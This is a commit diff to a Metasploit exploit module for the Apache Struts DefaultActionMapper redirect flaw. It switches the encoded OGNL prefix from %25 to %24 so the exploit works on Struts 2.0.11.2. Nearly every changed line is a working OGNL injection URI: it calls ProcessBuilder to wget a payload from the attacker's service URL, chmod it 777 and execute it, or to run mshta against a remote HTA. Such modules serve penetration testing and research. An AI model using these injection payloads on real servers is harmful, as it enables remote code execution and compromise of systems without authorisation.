Make OGNL expressions compatible with struts 2.0.11.2

2013-11-20 12:42:10 -06:00 · 2013-11-20 12:42:10 -06:00 · 18e69bee8c
parent 110e78a1ad
commit 18e69bee8c
1 changed files with 7 additions and 7 deletions
--- a/modules/exploits/multi/http/struts_default_action_mapper.rb
+++ b/modules/exploits/multi/http/struts_default_action_mapper.rb
@ -156,11 +156,11 @@ class Metasploit3 < Msf::Exploit::Remote
    proof = rand_text_alpha(6 + rand(4))

    res = send_request_cgi({
-      'uri' => "#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}",
+      'uri' => "#{uri}?redirect:%24{new%20java.lang.String('#{proof}')}",
      'method' => 'GET'
    })

-    if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/
+    if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ and res.headers['Location'] !~ /String/
      return Exploit::CheckCode::Vulnerable
    end

@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote
    proof = rand_text_alpha(6 + rand(4))

    res = send_request_cgi({
-      'uri' => "#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}",
+      'uri' => "#{uri}?redirect:%24{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}",
      'method' => 'GET'
    })

@ -215,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote
    fname = "#{fname}/" unless fname =~ %r'/$'
    fname << downfile
    uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
+    uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"

    print_status("#{rhost}:#{rport} - Downloading payload to #{fname}...")

@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote
    # chmod
    #
    uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
+    uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"

    print_status("#{rhost}:#{rport} - Make payload executable...")

@ -256,7 +256,7 @@ class Metasploit3 < Msf::Exploit::Remote
    # execute
    #
    uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f'))).start()}"
+    uri << "?redirect:%24{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f'))).start()}"

    print_status("#{rhost}:#{rport} - Execute payload...")

@ -285,7 +285,7 @@ class Metasploit3 < Msf::Exploit::Remote
    # execute hta
    #
    uri = normalize_uri(target_uri.path)
-    uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\u002f')})).start()}"
+    uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\u002f')})).start()}"

    print_status("#{rhost}:#{rport} - Execute payload through malicious HTA...")